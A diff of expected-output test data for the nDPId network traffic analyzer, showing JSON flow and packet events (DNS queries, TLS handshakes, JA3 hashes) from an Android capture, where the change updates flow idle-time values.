00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867244,"flow_last_seen":1582454867244,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1582454867244,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1582454867244,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1582454867244,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA+qTJAAEARDBvAqAIQwKgCAYvxADUAKg90oPQBAAABAAAAAAAABHRpbWUHYW5kcm9pZANjb20AAAEAAQ=="} 00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867244,"flow_last_seen":1582454867244,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1582454867244,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"time.android.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -86,134 +86,134 @@ 00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867637,"flow_last_seen":1582454867637,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454867637,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"clients1.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1582454867639,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454867639,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRpSEAAEARUBnAqAIBwKgCEAA1huwAPTVyr3qBgAABAAEAAAAACGNsaWVudHMxBmdvb2dsZQNjb20AAAEAAcAMAAEAAQAAANoABNjvJng="} 00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":96,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867637,"flow_last_seen":1582454867639,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454867639,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"clients1.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867688,"flow_last_seen":1582454867688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454867688,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1582454867688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867688,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8oxlAAEAG1YLAqAIQ2O8meIDOAbtPCpBsAAAAAKAC\/\/\/waQAAAgQFtAQCCAr\/\/zN1AAAAAAEDAwg="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1582454867702,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867702,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA840EAAHYGn1rY7yZ4wKgCEAG7gM7sufL\/TwqQbaAS6yANxQAAAgQFZAQCCAoG5BEl\/\/8zdQEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1582454867703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454867703,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0oxpAAEAG1YnAqAIQ2O8meIDOAbtPCpBt7LnzAIAQAVcmCAAAAQEICv\/\/M3kG5BEl"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867688,"flow_last_seen":1582454867688,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454867688,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1582454867688,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867688,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8oxlAAEAG1YLAqAIQ2O8meIDOAbtPCpBsAAAAAKAC\/\/\/waQAAAgQFtAQCCAr\/\/zN1AAAAAAEDAwg="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1582454867702,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867702,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA840EAAHYGn1rY7yZ4wKgCEAG7gM7sufL\/TwqQbaAS6yANxQAAAgQFZAQCCAoG5BEl\/\/8zdQEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1582454867703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454867703,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0oxpAAEAG1YnAqAIQ2O8meIDOAbtPCpBt7LnzAIAQAVcmCAAAAQEICv\/\/M3kG5BEl"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867723,"flow_last_seen":1582454867723,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454867723,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1582454867723,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454867723,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBqYtAAEARC7\/AqAIQwKgCAdY1ADUALYAStecBAAABAAAAAAAABHBsYXkKZ29vZ2xlYXBpcwNjb20AAAEAAQ=="} 00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867723,"flow_last_seen":1582454867723,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454867723,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"play.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00967{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454867688,"flow_last_seen":1582454867759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1582454867759,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00967{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454867688,"flow_last_seen":1582454867759,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1582454867759,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1582454867761,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454867761,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRO4cAAEARubPAqAIBwKgCEAA11jUAPbDuteeBgAABAAEAAAAABHBsYXkKZ29vZ2xlYXBpcwNjb20AAAEAAcAMAAEAAQAAARgABKzZFEo="} 00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":102,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867723,"flow_last_seen":1582454867761,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454867761,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"play.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.74"}} -01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454867688,"flow_last_seen":1582454867788,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1582454867788,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"b31c0b82752ea0e2c48b8ce46e9263e5","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} -02356{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454867688,"flow_last_seen":1582454867789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3887,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1582454867789,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.crowdsource.google.com,*.g.co,*.gcp.gvt2.com,*.gcpcdn.gvt1.com,*.ggpht.cn,*.gkecnapps.cn,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecnapps.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gstaticcnapps.cn,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.wear.gkecnapps.cn,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.youtubekids.com,*.yt.be,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,developers.android.google.cn,g.co,ggpht.cn,gkecnapps.cn,goo.gl,google-analytics.com,google.com,googlecnapps.cn,googlecommerce.com,source.android.google.cn,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com,youtubekids.com,yt.be","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"b31c0b82752ea0e2c48b8ce46e9263e5","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google.com","fingerprint":"80:50:28:F4:84:F5:C4:C6:41:DE:75:67:38:C4:A6:E2:59:FF:75:42"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868348,"flow_last_seen":1582454868348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454868348,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1582454868348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868348,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8A3VAAEAGs2vAqAIQrNkUSs0GAbvbqzdvAAAAAKAC\/\/+uLAAAAgQFtAQCCAr\/\/zQaAAAAAAEDAwg="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1582454868386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868386,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8PjQAAHUGg6ys2RRKwKgCEAG7zQbWjo3E26s3cKAS6yAJ1AAAAgQFZAQCCAq9hJee\/\/80GgEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1582454868386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454868386,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0A3ZAAEAGs3LAqAIQrNkUSs0GAbvbqzdw1o6NxYAQAVciEQAAAQEICv\/\/NCS9hJee"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868348,"flow_last_seen":1582454868424,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1582454868424,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454867688,"flow_last_seen":1582454867788,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1582454867788,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"b31c0b82752ea0e2c48b8ce46e9263e5","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} +02356{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454867688,"flow_last_seen":1582454867789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3887,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1582454867789,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.crowdsource.google.com,*.g.co,*.gcp.gvt2.com,*.gcpcdn.gvt1.com,*.ggpht.cn,*.gkecnapps.cn,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecnapps.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gstaticcnapps.cn,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.wear.gkecnapps.cn,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.youtubekids.com,*.yt.be,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,developers.android.google.cn,g.co,ggpht.cn,gkecnapps.cn,goo.gl,google-analytics.com,google.com,googlecnapps.cn,googlecommerce.com,source.android.google.cn,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com,youtubekids.com,yt.be","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"b31c0b82752ea0e2c48b8ce46e9263e5","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google.com","fingerprint":"80:50:28:F4:84:F5:C4:C6:41:DE:75:67:38:C4:A6:E2:59:FF:75:42"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868348,"flow_last_seen":1582454868348,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454868348,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1582454868348,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868348,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8A3VAAEAGs2vAqAIQrNkUSs0GAbvbqzdvAAAAAKAC\/\/+uLAAAAgQFtAQCCAr\/\/zQaAAAAAAEDAwg="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1582454868386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868386,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8PjQAAHUGg6ys2RRKwKgCEAG7zQbWjo3E26s3cKAS6yAJ1AAAAgQFZAQCCAq9hJee\/\/80GgEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1582454868386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454868386,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0A3ZAAEAGs3LAqAIQrNkUSs0GAbvbqzdw1o6NxYAQAVciEQAAAQEICv\/\/NCS9hJee"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868348,"flow_last_seen":1582454868424,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1582454868424,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868462,"flow_last_seen":1582454868462,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1582454868462,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 